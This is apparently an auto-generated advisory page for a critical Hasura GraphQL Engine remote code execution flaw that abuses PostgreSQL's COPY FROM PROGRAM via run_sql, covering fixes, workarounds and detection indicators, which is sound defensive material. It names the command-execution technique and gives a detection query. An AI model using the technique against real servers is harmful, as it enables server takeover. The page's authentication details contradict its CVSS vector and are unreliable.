CVE-2021-47748 – CVE-2021-47748 is a critical remote code execut... (How to Fix)

Q: What is the severity of CVE-2021-47748?

CVE-2021-47748 has a CVSS score of 9.8 (CRITICAL). CVE-2021-47748 is a critical remote code execution vulnerability in Hasura GraphQL Engine that allows attackers to execute arbitrary shell commands on the server. Attackers can exploit this by crafting malicious GraphQL queries that leverage PostgreSQL's COPY FROM PROGRAM functionality through the run_sql endpoint. Organizations running vulnerable versions of Hasura GraphQL Engine are affected.

📋 TL;DR

CVE-2021-47748 is a critical remote code execution vulnerability in Hasura GraphQL Engine that allows attackers to execute arbitrary shell commands on the server. Attackers can exploit this by crafting malicious GraphQL queries that leverage PostgreSQL's COPY FROM PROGRAM functionality through the run_sql endpoint. Organizations running vulnerable versions of Hasura GraphQL Engine are affected.

💻 Affected Systems

Products:

Hasura GraphQL Engine

Versions: Versions up to and including 1.3.3

Operating Systems: All platforms running Hasura GraphQL Engine

Default Config Vulnerable: ⚠️ Yes

Notes: Requires access to the run_sql endpoint, which is typically available to users with admin privileges or through misconfigured permissions.

📦 What is this software?

Graphql Engine by Hasura

View all CVEs affecting Graphql Engine →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise allowing attackers to execute arbitrary commands with database privileges, potentially leading to data theft, ransomware deployment, or lateral movement within the network.

🟠

Likely Case

Attackers gain shell access to the database server, enabling data exfiltration, credential harvesting, and installation of persistence mechanisms.

🟢

If Mitigated

With proper network segmentation and least privilege database accounts, impact is limited to the database server itself rather than full system compromise.

🌐 Internet-Facing: HIGH

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authentication to the Hasura GraphQL Engine, but this can be bypassed if the endpoint is misconfigured or if attackers obtain valid credentials.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.3.4 and later

Vendor Advisory: https://github.com/hasura/graphql-engine/security/advisories/GHSA-4w2f-88mj-8w5f

Restart Required: Yes

Instructions:

1. Update Hasura GraphQL Engine to version 1.3.4 or later. 2. Restart the Hasura service. 3. Verify the update was successful by checking the version.

🔧 Temporary Workarounds

Disable run_sql endpoint

all

Remove or restrict access to the vulnerable run_sql endpoint if not required for operations.

Modify Hasura configuration to disable or restrict the /v1/run_sql endpoint

Network segmentation

all

Restrict network access to Hasura GraphQL Engine to only trusted sources.

Configure firewall rules to limit access to Hasura ports (typically 8080)

🧯 If You Can't Patch

Implement strict network access controls to limit exposure of Hasura GraphQL Engine
Apply principle of least privilege to database accounts and restrict run_sql endpoint access

🔍 How to Verify

Check if Vulnerable:

Check if Hasura GraphQL Engine version is 1.3.3 or earlier and if the run_sql endpoint is accessible.

Check Version:

curl -X POST http://localhost:8080/v1/version

Verify Fix Applied:

Verify Hasura GraphQL Engine version is 1.3.4 or later and test that the run_sql endpoint no longer accepts malicious COPY FROM PROGRAM commands.

📡 Detection & Monitoring

Log Indicators:

Unusual SQL queries containing COPY FROM PROGRAM
Multiple failed authentication attempts to run_sql endpoint
Unexpected system command execution in database logs

Network Indicators:

Unusual traffic patterns to /v1/run_sql endpoint
Outbound connections from database server to unexpected destinations

SIEM Query:

source="hasura" AND (uri_path="/v1/run_sql" AND query="COPY FROM PROGRAM")

📊 Metadata

CVE ID: CVE-2021-47748

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

EPSS Score: 0.36% exploit probability (57.4th percentile)

Published: January 21, 2026

Last Updated: February 2, 2026

🔗 References

https://github.com/hasura/graphql-engine Product
https://www.exploit-db.com/exploits/49802 Exploit
https://www.vulncheck.com/advisories/hasura-graphql-remote-code-execution Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-47748, you might also want to check these: